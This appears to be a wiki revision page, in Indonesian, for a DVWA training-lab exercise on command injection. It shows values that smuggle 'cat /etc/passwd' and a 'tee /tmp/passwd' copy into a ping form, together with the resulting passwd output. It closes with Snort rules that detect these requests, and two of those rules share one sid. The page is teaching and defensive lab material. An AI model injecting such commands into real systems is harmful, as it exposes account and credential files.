Difference between revisions of "DVWA: Command Injection"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 53: | Line 53: | ||
==Snort Rule== | ==Snort Rule== | ||
− | Untuk mendeteksi kegiatan ini, bisa tambahkan di snort local.rules | + | Untuk mendeteksi kegiatan ini, bisa tambahkan di snort local.rules beberapa alternatif rules berikut |
− | alert tcp any any -> 192.168.0.100 80 (content: " | + | alert tcp any any -> 192.168.0.100 80 (msg:"passwd"; content:"passwd"; nocase; classtype:web-application-attack; sid:1000020;) |
+ | alert tcp any any -> 192.168.0.100 80 (msg:"/passwd"; content:"%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000020;) | ||
+ | alert tcp any any -> 192.168.0.100 80 (msg:"/etc/passwd"; content:"%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000021;) | ||
+ | alert tcp any any -> 192.168.0.100 80 (msg:"cat+%2Fetc%2Fpasswd"; content:"cat+%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000022;) | ||
+ | |||
+ | sebaiknya pilih yang paling spesifik, jangan yang general. |
Revision as of 19:08, 31 March 2017
- Login ke DVWA
- Klik Command Injection
- Ping isi IP yang bisa di ping misalnya, router anda, misalnya
192.168.0.223
- Hasilnya kira-kira
PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data. 64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms 64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms 64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms 64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms --- 192.168.0.223 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 2999ms rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms
- Tambahkan perintah cat sesudah nomor IP, misalnya
192.168.0.223; cat /etc/passwd
PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data. 64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms 64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms 64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms 64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms --- 192.168.0.223 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 2999ms rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin .. .. dst
- Lihat source DVWA mengapa melakukan hal itu
cat /var/www/html/DVWA-1.9/vulnerabilities/exec/source/low.php
- Kalau iseng, coba copy password ke tmp, inject command
192.168.1.106; cat /etc/passwd | tee /tmp/passwd
Snort Rule
Untuk mendeteksi kegiatan ini, bisa tambahkan di snort local.rules beberapa alternatif rules berikut
alert tcp any any -> 192.168.0.100 80 (msg:"passwd"; content:"passwd"; nocase; classtype:web-application-attack; sid:1000020;) alert tcp any any -> 192.168.0.100 80 (msg:"/passwd"; content:"%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000020;) alert tcp any any -> 192.168.0.100 80 (msg:"/etc/passwd"; content:"%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000021;) alert tcp any any -> 192.168.0.100 80 (msg:"cat+%2Fetc%2Fpasswd"; content:"cat+%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000022;)
sebaiknya pilih yang paling spesifik, jangan yang general.